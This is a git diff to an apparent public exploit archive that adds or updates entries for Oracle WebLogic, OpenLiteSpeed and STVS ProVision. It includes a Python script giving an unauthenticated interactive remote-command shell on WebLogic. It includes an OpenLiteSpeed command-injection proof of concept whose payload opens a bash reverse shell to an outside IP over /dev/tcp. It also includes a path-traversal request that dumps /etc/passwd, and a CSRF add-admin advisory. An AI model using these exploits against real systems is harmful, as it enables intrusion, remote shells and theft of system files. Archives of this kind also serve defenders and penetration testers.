diff --git a/exploits/java/webapps/49479.py b/exploits/java/webapps/49479.py
index b577bccdf..bc4691b9d 100755
--- a/exploits/java/webapps/49479.py
+++ b/exploits/java/webapps/49479.py
@@ -1,6 +1,6 @@
# Exploit Title: Oracle WebLogic Server 12.2.1.0 - RCE (Unauthenticated)
-# Google Dork: inurl:\\\"/console/login/LoginForm.jsp\\\"
-# Date: 25/1/2021
+# Google Dork: inurl:"/console/login/LoginForm.jsp"
+# Date: 01/26/2021
# Exploit Author: CHackA0101
# Vendor Homepage: https://www.oracle.com/security-alerts/cpuoct2020.html
# Version: Oracle WebLogic Server, version 12.2.1.0
@@ -15,77 +15,74 @@
import requests
import argparse
import http.client
-http.client.HTTPConnection._http_vsn = 10
-http.client.HTTPConnection._http_vsn_str = \\\'HTTP/1.0\\\'
+http.client.HTTPConnection._http_vsn=10
+http.client.HTTPConnection._http_vsn_str='HTTP/1.0'
+parse=argparse.ArgumentParser()
+parse.add_argument('-u','--url',help='url')
+args=parse.parse_args()
-parse = argparse.ArgumentParser()
-parse.add_argument(\\\'-u\\\', \\\'--url\\\', help=\\\'url\\\')
-args = parse.parse_args()
-
-proxies = {\\\'http\\\' : \\\'127.0.0.1:8080\\\'}
-cmd_ = \\\"\\\"
+proxies={'http':'127.0.0.1:8080'}
+cmd_=""
# Headers
headers = {
- \\\"User-Agent\\\": \\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:73.0) Gecko/20100101 Firefox/73.0\\\",
- \\\"Accept\\\": \\\"application/json, text/plain, */*\\\",
- \\\"Accept-Language\\\": \\\"zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2\\\",
- \\\"Accept-Encoding\\\": \\\"gzip, deflate\\\",
- \\\"Upgrade-Insecure-Requests\\\": \\\"1\\\",
- \\\"Content-Type\\\": \\\"application/x-www-form-urlencoded\\\",
- \\\"Cache-Control\\\": \\\"max-age=0\\\",
- \\\"Connection\\\": \\\"close\\\"
+ "User-Agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15;rv:73.0)Gecko/20100101 Firefox/73.0",
+ "Accept":"application/json,text/plain,*/*",
+ "Accept-Language":"zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
+ "Accept-Encoding":"gzip,deflate",
+ "Upgrade-Insecure-Requests":"1",
+ "Content-Type":"application/x-www-form-urlencoded",
+ "Cache-Control":"max-age=0",
+ "Connection":"close"
}
# Oracle WebLogic Server 12.2.1.0 - Unauthenticated RCE via python Explotation:
-url = args.url + \\\"\\\"\\\"/console/images/%252E%252E%252Fconsole.portal?_nfpb=false&_pageLabel=&handle=com.tangosol.coherence.mvel2.sh.ShellSession(\\\"java.lang.Runtime.getRuntime().exec();\\\");\\\"\\\"\\\"
-url_ = args.url + \\\"/console/images/%252E%252E%252Fconsole.portal\\\"
+url=args.url+"""/console/images/%252E%252E%252Fconsole.portal?_nfpb=false&_pageLabel=&handle=com.tangosol.coherence.mvel2.sh.ShellSession("java.lang.Runtime.getRuntime().exec();");"""
+url_=args.url+"/console/images/%252E%252E%252Fconsole.portal"
-form_data_ = \\\"\\\"\\\"_nfpb=false&_pageLabel=HomePage1&handle=com.tangosol.coherence.mvel2.sh.ShellSession(\\\"weblogic.work.ExecuteThread executeThread = (weblogic.work.ExecuteThread) Thread.currentThread();
+form_data_="""_nfpb=false&_pageLabel=HomePage1&handle=com.tangosol.coherence.mvel2.sh.ShellSession("weblogic.work.ExecuteThread executeThread=(weblogic.work.ExecuteThread)Thread.currentThread();
weblogic.work.WorkAdapter adapter = executeThread.getCurrentWork();
-java.lang.reflect.Field field = adapter.getClass().getDeclaredField(\\\"connectionHandler\\\");
+java.lang.reflect.Field field = adapter.getClass().getDeclaredField("connectionHandler");
field.setAccessible(true);
Object obj = field.get(adapter);
-weblogic.servlet.internal.ServletRequestImpl req = (weblogic.servlet.internal.ServletRequestImpl) obj.getClass().getMethod(\\\"getServletRequest\\\").invoke(obj);
-String cmd = req.getHeader(\\\"cmd\\\");
-String[] cmds = System.getProperty(\\\"os.name\\\").toLowerCase().contains(\\\"window\\\") ? new String[]{\\\"cmd.exe\\\", \\\"/c\\\", cmd} : new String[]{\\\"/bin/sh\\\", \\\"-c\\\", cmd};
+weblogic.servlet.internal.ServletRequestImpl req = (weblogic.servlet.internal.ServletRequestImpl) obj.getClass().getMethod("getServletRequest").invoke(obj);
+String cmd = req.getHeader("cmd");
+String[] cmds = System.getProperty("os.name").toLowerCase().contains("window") ? new String[]{"cmd.exe","/c", cmd} : new String[]{"/bin/sh","-c", cmd};
if (cmd != null) {
- String result = new java.util.Scanner(java.lang.Runtime.getRuntime().exec(cmds).getInputStream()).useDelimiter(\\\"\\\\\\\\\\\\A\\\").next();
- weblogic.servlet.internal.ServletResponseImpl res = (weblogic.servlet.internal.ServletResponseImpl) req.getClass().getMethod(\\\"getResponse\\\").invoke(req);
+ String result = new java.util.Scanner(java.lang.Runtime.getRuntime().exec(cmds).getInputStream()).useDelimiter("\\\A").next();
+ weblogic.servlet.internal.ServletResponseImpl res=(weblogic.servlet.internal.ServletResponseImpl)req.getClass().getMethod("getResponse").invoke(req);
res.getServletOutputStream().writeStream(new weblogic.xml.util.StringInputStream(result));
res.getServletOutputStream().flush();
- res.getWriter().write(\\\"\\\");
-}executeThread.interrupt();
-\\\");\\\"\\\"\\\"
+ res.getWriter().write("");}executeThread.interrupt();");"""
#data_ = parse.urlencode(form_data_)
-results1 = requests.get(url, headers=headers)
+results1=requests.get(url,headers=headers)
-if results1.status_code == 200:
- print(\\\"(Load Headers... \\\\n\\\")
- print(\\\"(Data urlencode... \\\\n\\\")
- print(\\\"(Execute exploit... \\\\n\\\")
- print(\\\"(CHackA0101GNU/Linux)$ Successful Exploitation \\\\n\\\")
+if results1.status_code==200:
+ print("(Load Headers...)\n")
+ print("(Data urlencode...)\n")
+ print("(Execute exploit...)\n")
+ print("(CHackA0101-GNU/Linux)$ Successful Exploitation.\n")
while True:
- cmd_test = input(\\\"(CHackA0101GNU/Linux)$ \\\")
- if cmd_test == \\\"exit\\\":
+ cmd_test = input("(CHackA0101GNU/Linux)$ ")
+ if cmd_test=="exit":
break
else:
try:
cmd_ = cmd_test
headers = {
- \\\'cmd\\\': cmd_,
- \\\'Content-Type\\\': \\\'application/x-www-form-urlencoded\\\',
- \\\'User-Agent\\\': \\\'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36\\\',
- \\\'Accept\\\': \\\'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9\\\',
- \\\'Connection\\\': \\\'close\\\',
- \\\'Accept-Encoding\\\': \\\'gzip, deflate\\\',
- \\\'Content-Length\\\': \\\'1244\\\',
- \\\'Content-Type\\\': \\\'application/x-www-form-urlencoded\\\'
+ 'cmd': cmd_,
+ 'Content-Type':'application/x-www-form-urlencoded',
+ 'User-Agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36',
+ 'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9',
+ 'Connection':'close',
+ 'Accept-Encoding':'gzip,deflate',
+ 'Content-Length':'1244',
+ 'Content-Type':'application/x-www-form-urlencoded'
}
results_ = requests.post(url_, data=form_data_, headers=headers, stream=True).text
print(results_)
except:
pass
else:
- print(\\\"(CHackA0101GNU/Linux)$ Fail.\\\\n\\\")
\ No newline at end of file
+ print("(CHackA0101-GNU/Linux)$ Fail.\n")
\ No newline at end of file
diff --git a/exploits/multiple/webapps/49483.txt b/exploits/multiple/webapps/49483.txt
new file mode 100644
index 000000000..e1dd5cd8b
--- /dev/null
+++ b/exploits/multiple/webapps/49483.txt
@@ -0,0 +1,38 @@
+# Exploit Title: Openlitespeed WebServer 1.7.8 - Command Injection (Authenticated)
+# Date: 26/1/2021
+# Exploit Author: cmOs - SunCSR
+# Vendor Homepage: https://openlitespeed.org/
+# Software Link: https://openlitespeed.org/kb/install-from-binary/
+# Version: 1.7.8
+# Tested on Windows 10
+
+
+Step 1: Log in to the dashboard using the Administrator account.
+Step 2 : Access Server Configuration > External App > Command
+Step 3: Set "Start By Server *" Value to "Yes (Through CGI Daemon)
+Step 4 : Inject payload "fcgi-bin/lsphp5/../../../../../bin/bash -c 'bash -i >& /dev/tcp/127.0.0.1/1234 0>&1'" to "Command" value
+Step 5: Graceful Restart
+
+[POC]
+
+POST /view/confMgr.php HTTP/1.1
+Host: target:7080
+Connection: close
+Content-Length: 579
+Accept: text/html, */*; q=0.01
+X-Requested-With: XMLHttpRequest
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
+(KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+Origin: https://target:7080
+Sec-Fetch-Site: same-origin
+Sec-Fetch-Mode: cors
+Sec-Fetch-Dest: empty
+Referer: https://target:7080/index.php
+Accept-Encoding: gzip, deflate
+Accept-Language: en-US,en;q=0.9
+Cookie: LSUI37FE0C43B84483E0=b8e3df9c8a36fc631dd688accca82aee;
+litespeed_admin_lang=english; LSID37FE0C43B84483E0=W7zzfuEznhk%3D;
+LSPA37FE0C43B84483E0=excYiZbpUS4%3D
+
+name=lsphp&address=uds%3A%2F%2Ftmp%2Flshttpd%2Flsphp.sock¬e=&maxConns=10&env=PHP_LSAPI_CHILDREN%3D10%0D%0ALSAPI_AVOID_FORK%3D200M&initTimeout=60&retryTimeout=0&persistConn=1&pcKeepAliveTimeout=&respBuffer=1&autoStart=2&path=fcgi-bin%2Flsphp5%2F..%2F..%2F..%2F..%2F..%2Fbin%2Fbash+-c+'bash+-i+%3E%26+%2Fdev%2Ftcp%2F192.168.17.52%2F1234+0%3E%261'&backlog=100&instances=0&extUser=&extGroup=&umask=&runOnStartUp=3&extMaxIdleTime=&priority=0&memSoftLimit=2047M&memHardLimit=2047M&procSoftLimit=1400&procHardLimit=1500&a=s&m=serv&p=ext&t=A_EXT_LSAPI&r=lsphp&tk=0.08677800+1611561077
\ No newline at end of file
diff --git a/exploits/ruby/webapps/49481.txt b/exploits/ruby/webapps/49481.txt
new file mode 100644
index 000000000..500fedc0c
--- /dev/null
+++ b/exploits/ruby/webapps/49481.txt
@@ -0,0 +1,121 @@
+# Exploit Title: STVS ProVision 5.9.10 - File Disclosure (Authenticated)
+# Date: 19.01.2021
+# Exploit Author: LiquidWorm
+# Vendor Homepage: http://www.stvs.ch
+
+
+STVS ProVision 5.9.10 (archive.rb) Authenticated File Disclosure Vulnerability
+
+
+Vendor: STVS SA
+Product web page: http://www.stvs.ch
+Platform: Ruby
+Affected version: 5.9.10 (build 2885-3a8219a)
+ 5.9.9 (build 2882-7c3b787)
+ 5.9.7 (build 2871-a450938)
+ 5.9.1 (build 2771-1bbed11)
+ 5.9.0 (build 2701-6123026)
+ 5.8.6 (build 2557-84726f7)
+ 5.7
+ 5.6
+ 5.5
+
+Summary: STVS is a Swiss company specializing in development of
+software for digital video recording for surveillance cameras
+as well as the establishment of powerful and user-friendly IP
+video surveillance networks.
+
+Desc: The NVR software ProVision suffers from an authenticated
+arbitrary file disclosure vulnerability. Input passed through
+the files parameter in archive download script (archive.rb) is
+not properly verified before being used to download files. This
+can be exploited to disclose the contents of arbitrary and sensitive
+files.
+
+Tested on: Ubuntu 14.04.3
+ nginx/1.12.1
+ nginx/1.4.6
+ nginx/1.1.19
+ nginx/0.7.65
+ nginx/0.3.61
+
+
+Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+ @zeroscience
+
+
+Advisory ID: ZSL-2021-5623
+Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5623.php
+
+19.01.2021
+
+--
+
+
+#1 LFI Prober (FP):
+-------------------
+
+GET /archive/download?files=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd HTTP/1.1
+Host: 192.168.1.17
+Authorization: Digest username="admin", realm="ProVision", nonce="MjAyMS0wMS0xOSAwMDowNjo0NTo2OTMwMTE6NDk2MmVkNzM2OWIxNzMzNzRjZDc3YzY0NjM3MmNhNz", uri="/archive/download", algorithm=MD5, response="aceffbb0a121570f98a9f4678470a588", opaque="3c837ec895bd5fedcdad8674184de82e", qop=auth, nc=000001ca, cnonce="ebed759486b87a80"
+Accept: application/json, text/javascript, */*
+X-Requested-With: XMLHttpRequest
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
+Origin: http://192.168.1.17
+Referer: http://192.168.1.17/archive
+Accept-Encoding: gzip, deflate
+Accept-Language: en-US,en;q=0.9
+Cookie: last_stream=1; __flash__info=
+Connection: close
+
+HTTP/1.1 500 Not Found
+Server: nginx/1.4.6 (Ubuntu)
+Date: Mon, 18 Jan 2021 23:23:30 GMT
+Content-Type: text/html
+Content-Length: 2727
+Connection: close
+
+`Archive` application problem
Archive::Controllers::FileDownload.GET
TypeError can't convert nil into String:
- /usr/local/lib/ruby/site_ruby/1.8/apps/archive.rb:392:in `initialize'
- /usr/local/lib/ruby/site_ruby/1.8/apps/archive.rb:392:in `new'
- /usr/local/lib/ruby/site_ruby/1.8/apps/archive.rb:392:in `get'
- (eval):27:in `send'
- (eval):27:in `service'
- /usr/local/lib/ruby/site_ruby/1.8/ext/security.rb:79:in `service'
- /usr/local/lib/ruby/site_ruby/1.8/ext/forward.rb:54:in `run'
- /usr/local/lib/ruby/gems/1.8/gems/camping-1.5.180/lib/camping/reloader.rb:117:in `run'
- /usr/local/lib/ruby/gems/1.8/gems/mongrel-1.0.5/lib/mongrel/camping.rb:53:in `process'
- /usr/local/lib/ruby/gems/1.8/gems/mongrel-1.0.5/lib/mongrel/camping.rb:52:in `synchronize'
- /usr/local/lib/ruby/gems/1.8/gems/mongrel-1.0.5/lib/mongrel/camping.rb:52:in `process'
- /usr/local/lib/ruby/gems/1.8/gems/mongrel-1.0.5/lib/mongrel.rb:626:in `process_client'
- /usr/local/lib/ruby/gems/1.8/gems/mongrel-1.0.5/lib/mongrel.rb:625:in `each'
- /usr/local/lib/ruby/gems/1.8/gems/mongrel-1.0.5/lib/mongrel.rb:625:in `process_client'
- /usr/local/lib/ruby/gems/1.8/gems/mongrel-1.0.5/lib/mongrel.rb:751:in `run'
- /usr/local/lib/ruby/gems/1.8/gems/mongrel-1.0.5/lib/mongrel.rb:751:in `initialize'
- /usr/local/lib/ruby/gems/1.8/gems/mongrel-1.0.5/lib/mongrel.rb:751:in `new'
- /usr/local/lib/ruby/gems/1.8/gems/mongrel-1.0.5/lib/mongrel.rb:751:in `run'
- /usr/local/lib/ruby/gems/1.8/gems/mongrel-1.0.5/lib/mongrel.rb:735:in `initialize'
- /usr/local/lib/ruby/gems/1.8/gems/mongrel-1.0.5/lib/mongrel.rb:735:in `new'
- /usr/local/lib/ruby/gems/1.8/gems/mongrel-1.0.5/lib/mongrel.rb:735:in `run'
- /usr/local/lib/ruby/gems/1.8/gems/mongrel-1.0.5/lib/mongrel/configurator.rb:282:in `run'
- /usr/local/lib/ruby/gems/1.8/gems/mongrel-1.0.5/lib/mongrel/configurator.rb:281:in `each'
- /usr/local/lib/ruby/gems/1.8/gems/mongrel-1.0.5/lib/mongrel/configurator.rb:281:in `run'
- /usr/local/bin/provision_server:69:in `cloaker_'
- /usr/local/lib/ruby/gems/1.8/gems/mongrel-1.0.5/lib/mongrel/configurator.rb:149:in `call'
- /usr/local/lib/ruby/gems/1.8/gems/mongrel-1.0.5/lib/mongrel/configurator.rb:149:in `listener'
- /usr/local/bin/provision_server:63:in `cloaker_'
- /usr/local/lib/ruby/gems/1.8/gems/mongrel-1.0.5/lib/mongrel/configurator.rb:50:in `call'
- /usr/local/lib/ruby/gems/1.8/gems/mongrel-1.0.5/lib/mongrel/configurator.rb:50:in `initialize'
- /usr/local/bin/provision_server:62:in `new'
- /usr/local/bin/provision_server:62
+
+
+#2 LFI Prober (Verified):
+-------------------------
+
+$ curl "http://192.168.1.17/archive//download/%2Fetc%2Fpasswd"
+
+root:x:0:0:root:/root:/bin/bash
+daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
+bin:x:2:2:bin:/bin:/usr/sbin/nologin
+sys:x:3:3:sys:/dev:/usr/sbin/nologin
+sync:x:4:65534:sync:/bin:/bin/sync
+games:x:5:60:games:/usr/games:/usr/sbin/nologin
+man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
+lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
+mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
+news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
+uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
+proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
+www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
+backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
+list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
+irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
+gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
+nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
+libuuid:x:100:101::/var/lib/libuuid:
+syslog:x:101:104::/home/syslog:/bin/false
+mysql:x:102:105:MySQL Server,,,:/nonexistent:/bin/false
+provision:x:999:107::/srv/provision/provision:/bin/bash
+stvs:x:1000:100::/home/stvs:/bin/bash
+usbmux:x:103:46:usbmux daemon,,,:/home/usbmux:/bin/false
+ntp:x:104:108::/home/ntp:/bin/false
+messagebus:x:105:110::/var/run/dbus:/bin/false
+sshd:x:106:65534::/var/run/sshd:/usr/sbin/nologin
+statd:x:107:65534::/var/lib/nfs:/bin/false
+
+
+--
+Errno::ENOENT No such file or directory - /var/www/index.html:
+
+ /usr/local/lib/ruby/site_ruby/1.8/apps/archive.rb:392:in `initialize'
+ /usr/local/lib/ruby/site_ruby/1.8/apps/archive.rb:392:in `new'
+ /usr/local/lib/ruby/site_ruby/1.8/apps/archive.rb:392:in `get'
\ No newline at end of file
diff --git a/exploits/ruby/webapps/49482.html b/exploits/ruby/webapps/49482.html
new file mode 100644
index 000000000..7241490c7
--- /dev/null
+++ b/exploits/ruby/webapps/49482.html
@@ -0,0 +1,66 @@
+# Exploit Title: STVS ProVision 5.9.10 - Cross-Site Request Forgery (Add Admin)
+# Date: 19.01.2021
+# Exploit Author: LiquidWorm
+# Vendor Homepage: http://www.stvs.ch
+
+STVS ProVision 5.9.10 Cross-Site Request Forgery (Add Admin)
+
+
+Vendor: STVS SA
+Product web page: http://www.stvs.ch
+Platform: Ruby
+Affected version: 5.9.10 (build 2885-3a8219a)
+ 5.9.9 (build 2882-7c3b787)
+ 5.9.7 (build 2871-a450938)
+ 5.9.1 (build 2771-1bbed11)
+ 5.9.0 (build 2701-6123026)
+ 5.8.6 (build 2557-84726f7)
+ 5.7
+ 5.6
+ 5.5
+
+Summary: STVS is a Swiss company specializing in development of
+software for digital video recording for surveillance cameras
+as well as the establishment of powerful and user-friendly IP
+video surveillance networks.
+
+Desc: The application interface allows users to perform certain
+actions via HTTP requests without performing any validity checks
+to verify the requests. This can be exploited to perform certain
+actions with administrative privileges if a logged-in user visits
+a malicious web site.
+
+Tested on: Ubuntu 14.04.3
+ nginx/1.12.1
+ nginx/1.4.6
+ nginx/1.1.19
+ nginx/0.7.65
+ nginx/0.3.61
+
+
+Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+ @zeroscience
+
+
+Advisory ID: ZSL-2021-5625
+Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5625.php
+
+19.01.2021
+
+--
+
+
+
+
+
+
+
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index f31de1c62..5ffa51ea8 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -43674,3 +43674,6 @@ id,file,description,date,author,type,platform,port
49477,exploits/php/webapps/49477.txt,"Simple College Website 1.0 - 'full' Stored Cross Site Scripting",2021-01-26,"Marco Catalano",webapps,php,
49478,exploits/hardware/webapps/49478.txt,"Tenda AC5 AC1200 Wireless - 'WiFi Name & Password' Stored Cross Site Scripting",2021-01-26,"Chiragh Arora",webapps,hardware,
49479,exploits/java/webapps/49479.py,"Oracle WebLogic Server 12.2.1.0 - RCE (Unauthenticated)",2021-01-26,CHackA0101,webapps,java,
+49483,exploits/multiple/webapps/49483.txt,"Openlitespeed Web Server 1.7.8 - Command Injection (Authenticated)",2021-01-27,SunCSR,webapps,multiple,
+49481,exploits/ruby/webapps/49481.txt,"STVS ProVision 5.9.10 - File Disclosure (Authenticated)",2021-01-27,LiquidWorm,webapps,ruby,
+49482,exploits/ruby/webapps/49482.html,"STVS ProVision 5.9.10 - Cross-Site Request Forgery (Add Admin)",2021-01-27,LiquidWorm,webapps,ruby,